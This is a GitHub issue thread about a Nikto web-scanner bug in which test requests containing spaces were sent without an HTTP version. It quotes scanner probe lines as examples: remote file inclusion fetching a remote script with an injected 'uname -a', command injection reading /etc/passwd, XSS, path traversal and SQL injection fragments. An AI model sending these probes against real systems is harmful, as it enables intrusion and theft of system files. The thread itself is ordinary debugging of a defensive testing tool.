### ISSUE TITLE
Bug: two requests without HTTP version

### ISSUE THREAD

**Issue by digininja** [sullo/nikto#769]
I've just ran Nikto through Burp (and it worked perfectly) and then reviewed the calls and spotted requests to these two pages:

https://xx/topsites/index.php?page=http://cirt.net/rfiinc.txt??&cmd=uname
https://xx/topsites/index.php?page=http://cirt.net/rfiinc.txt??&cmd=uNikto

Both were missing the HTTP version in the GET request:

```
GET /topsites/index.php?page=http://cirt.net/rfiinc.txt??&cmd=uNikto -a
```

and

```
GET /topsites/index.php?page=http://cirt.net/rfiinc.txt??&cmd=uname -a
```

There was no response from the server as I'd expect.

Is this deliberate?

![image](https://user-images.githubusercontent.com/117081/179261555-78ea18ca-7c53-401c-93ed-d7ed1a38930c.png)

**Comment by digininja** [comment]
I should have continued to scroll, there are these as well:

GET /studip-1.3.0-2/studip-phplib/oohforms.inc?cmd=ls
GET /studip-1.3.0-2/studip-htdocs/archiv_assi.php?cmd=ls
GET /config.php?sql_language=http://cirt.net/rfiinc.txt??&cmd=0wn3d
GET /cgi-bin/info2www '(../../../../../../../bin/mail
GET /scripts/info2www '(../../../../../../../bin/mail
GET /cgi-bin/handler/netsonar;cat /etc/passwd|?data=Download
GET /admin/login.php?path=\"></form><form name=a><input
GET /article.php?sid=\"><Img Src=javascript:alert('Vulnerable')><Img
GET /cleartrust/ct_logon.asp?CTAuthMode=BASIC&CTLoginErrorMsg=xx&ct_orig_uri=\">< script>alert(1)/script><\"
GET /index.php?action=search&searchFor=\"><script>alert('Vulnerable')</script >
GET /site/' UNION
GET /scripts/excite;IFS=\"$\";/bin/cat /etc/passwd

I wondered if it was due to spaces but some of these have spaces in them and are still used.

**Comment by sullo** [comment]
I can't replicate this, however I'm experiencing some weirdness using burp. It seems like most/all of the responses are being answered by Burp and not the target. @digininja you check this for me?

`./nikto.pl -h https://google.com/ -useproxy http://localhost:8080  -D D`

In the output, the `'data' => ` element has the BurpSuite web response and not Google's. In the Burp UI it shows a request but not a response.

**Comment by sullo** [comment]
Ok I resolved the SSL issue with 41d2d066b2ef0e1049f7579d322d58b93aeff32d.

**Comment by sullo** [comment]
After trial and error I found it was indeed the space in the file portion of the tests causing that. I fixed them and more unnecessary space issues In cda31309fd910f555b7ad9af8ef69d0834014a66.

* Update db_tests to remove unnecessary spaces
* Enhance -dbcheck to:
   * Look for spaces inside the file portion of a test
   * Look for spaces before or after a "

**Comment by digininja** [comment]
That's interesting, I wonder why my single test run didn't reproduce it.

**Comment by sullo** [comment]
You can test it.
* Create a file `databases/udb_tests` and put this line in it
```
"000052","","","/no thing here","GET","[Ii]ndex [Oo]f","","","","","I win.","",""
```
* Set up burp proxy (assumed port 8080 below)

* Run nikto like: `./nikto.pl -h https://cirt.net/ -Plugins "@@none;tests" -useproxy http://localhost:8080 -Userdbs tests`

Request in burp proxy looks like
![image](https://user-images.githubusercontent.com/1474884/188738722-f932b33d-7159-4f0f-8d0c-4e1f48f325e4.png)

**Comment by digininja** [comment]
Is that HTTP/2 or 1.1?

**Comment by sullo** [comment]
What's happening is Nikto happily sends "GET /no thing here HTTP/1.1" as a request, which is not valid.

Burp is parsing the request line _properly_ by taking the text after the first space as the HTTP version--in my screenshot it's `thing`  (in your screenshot above `-a` is used).

So when sent to the server it will generate a 400 Bad Request since the HTTP version is not valid

In fact, if you make the test "/no HTTP/1.1" it will work fine in Burp.

This is only a problem if there is a space in Nikto's file field, since LibWhisker is built to not check for errors.

**Comment by sullo** [comment]
> Is that HTTP/2 or 1.1?

It's no version at all, hence Bad Request. The intent was HTTP/1.1 since my server doesn't speak HTTP/2.

**Comment by digininja** [comment]
That's what I thought it would be, but I thought I'd seen some tests with
spaces which worked.

**Comment by sullo** [comment]
I didn't notice any. But now I've gone through `db_tests` and corrected all the ones in the file portion, replacing space with %20.

**Comment by digininja** [comment]
I assume it was running through the same code for 2 as it was for 1.1, that
was my only thought about why I didn't see it last night but did on the
other test.

**Comment by digininja** [comment]
I've just tried it against my site running HTTP/2 and didn't get any bad
requests, I'll try it against a HTTP/1/.1 tomorrow and see if it does it on
that.
